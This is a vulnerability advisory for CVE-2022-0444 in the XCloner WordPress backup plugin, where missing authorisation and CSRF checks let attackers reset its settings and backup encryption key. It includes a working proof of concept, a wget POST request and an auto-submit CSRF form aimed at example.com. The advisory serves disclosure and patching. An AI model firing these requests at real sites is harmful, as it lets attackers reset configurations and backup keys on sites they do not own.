XCloner < 4.3.6 – Plugin Settings Reset | CVE 2022-0444 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks when resetting its settings, allowing unauthenticated attackers to reset them, including generating a new backup encryption key.

v4.3.5 added capability check, but CSRF one still missing.

Proof of Concept

v < 4.3.5 - wget "http://example.com/wp-admin/admin.php?action=rest-nonce" --post-data="xcloner_restore_defaults=1" -q -O-

v < 4.3.6 (via CSRF):

<form id="test" action="http://example.com/wp-admin/admin-ajax.php?action=rest-nonce" method="POST">
    <input type="text" name="xcloner_restore_defaults" value="1">
    <input type="submit" value="Submit"/>
</form>

Affects Plugins

xcloner-backup-and-restore

Fixed in 4.3.6

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

9567d295-43c7-4e59-9283-c7726f16d40b

Timeline

Publicly Published

2022-06-06 (about 3 years ago)

Added

2022-06-06 (about 3 years ago)

Last Updated

2023-03-06 (about 2 years ago)

Other

Published

Title

Published

2024-12-05

Title

Ultimate Coming Soon & Maintenance < 1.1.0 - Subscriber+ Template Name Update

Published

2025-05-16

Title

AnyWhere Elementor Pro <= 2.29 - Missing Authorization

Published

2024-06-06

Title

Extra Product Options for WooCommerce < 3.0.7 - Missing Authorization

Published

2024-04-25

Title

Knowledge Base documentation & wiki plugin – BasePress < 2.16.2.1 - Missing Authorization

Published

2025-03-27

Title

Just Writing Statistics < 5.4 - Missing Authorization